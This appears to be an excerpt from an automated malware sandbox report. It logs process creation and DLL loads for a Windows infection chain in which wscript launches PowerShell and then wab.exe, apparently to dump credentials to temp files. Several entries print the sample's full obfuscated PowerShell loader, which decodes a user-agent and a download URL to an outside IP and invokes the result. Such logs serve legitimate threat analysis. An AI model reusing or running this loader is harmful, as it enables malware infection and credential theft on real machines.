                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xkkian"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal Knyttelversenes Brilliancies Informatica200 Bloodroot Skrbeligt157 Vulcanisable Doseringsapparatet Superhuman Forbytter Branddr Simplifier commercializing Skuffelserne Tillukkede121 Transseksualismens Stamcafym Darkey Opdagelsesrejses Pretenders Preemphasize87 Scrawliness Standardisations Smedemestres Antibridal';If (${host}.CurrentCulture) {$Transplantat++;}Function Brassart($Slingrer){$Unbarking=$Slingrer.Length-$Transplantat;$Sendetiders='SUBsTRI';$Sendetiders+='ng';For( $Catacrotism=7;$Catacrotism -lt $Unbarking;$Catacrotism+=8){$Knyttelversenes+=$Slingrer.$Sendetiders.Invoke( $Catacrotism, $Transplantat);}$Knyttelversenes;}function Sarcophilus($Cerecloth){ & ($Grossisten) ($Cerecloth);}$Deletive=Brassart ' UnfitlMFer iswoMedr.vezleon.teiPhotolyl Vikin lHemat,raReevoki/saturan5Abac.na.Japaner0Domitiu ,eddykn(Servo.yWSlvtlysiAloewoonHo edkld Stippeo igmandwRettorysKafk,sk Opi,ionNByrdersTCrimina spec.al1Awingly0 .ctapo.Lilj.rk0Ebbinge;Camesth AfskrmnW Gona.eiSp.ceryn Sundhe6graaspu4Vesbite;Objekti DobbeltxKammede6Aquidne4Verserb;Pseudom SprogblrScru invAndr as:S,eepin1Kimblad2Leveful1Ut ovrd.tintall0 Lervar)Vinha,d forurenGwagglereDravyavc HaggadkBantamsoDec,nce/Fototek2Vedlige0 E stra1Udram t0Scotiat0 Doorma1 Fluori0Mur ero1Idrt.kl Si detnFDevadr,iCetacearHvorefte Sond lf .ookbio Augmenx elvang/Ringvej1Thewnes2Shikses1Porogam.grassch0Cleansg ';$Capkin=Brassart ' Ret.imUShreddesSti hvee.rydelarDemoral-Unwre.kADramming Mik iseIrishgrnpopsi,stUnaisle ';$Skrbeligt157=Brassart 'Sim,linh Paabu.tSugarintBoghvedpGeneral: Syn,rg/Pre.til/Lepidob1Kl,vare0Forudan3Uniso,a. Ungrea2Komp.ns3Hum.uri7 Sociol.Logogra8Tetremi6Data,le..rammab2Antilip4 Pissoi7Superin/Takte.iT ForsakeOpga gseVibratenManiernt inhesis owshaiGradieneUnionisr.odalis.bueformlA,teriopInspirak Mortif ';$Conscionableness=Brassart 'Stateli>Stalact ';$Grossisten=Brassart ' inergiforkodeeSemiurnxInosini ';$Easters='Superhuman';$Paleoandesite = Brassart ' BrudekeBlin,tec EfterbhPolytypoamar,ll Champla%Anl sbeasegnefrpTidalp.pHemocrydUncravia Spr.gft Baromea Bick,r% U rmme\waver,nAmidwif p HnetropspatiumePostnumlS andsfmMothbalu Dukkeal Seed eifamilieg ModtaghPithecoe int.rldInkorpo.I.formaBTjenesteMedi insSortime Theopha&Sbefabr&A sgnin TyvendeeTa terecAfflatuh v,rtumoUnciale DroplettSubvers ';Sarcophilus (Brassart ' Underm$SpinulagKredit lKldebrsoReekingbPaeanisaHjtelskl Endrud: enegaIAddictinOv.rvine uickexKrakelee Vedf,er Orchidtsvinek i tvilliokos,fornDecentr=Nonincl( Skyllec themsemSlu,gyhdTwin,le Mennesk/HenvejrcR,exper Pelycos$MikaagrPF.Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Appelmulighed.Bes && echo t"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\knsxyccvpjetrdvkvhhergkhudayiyl"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\npxqzvmpdrwyujswfruyulxqdskhbjcypu"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\xkkian"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
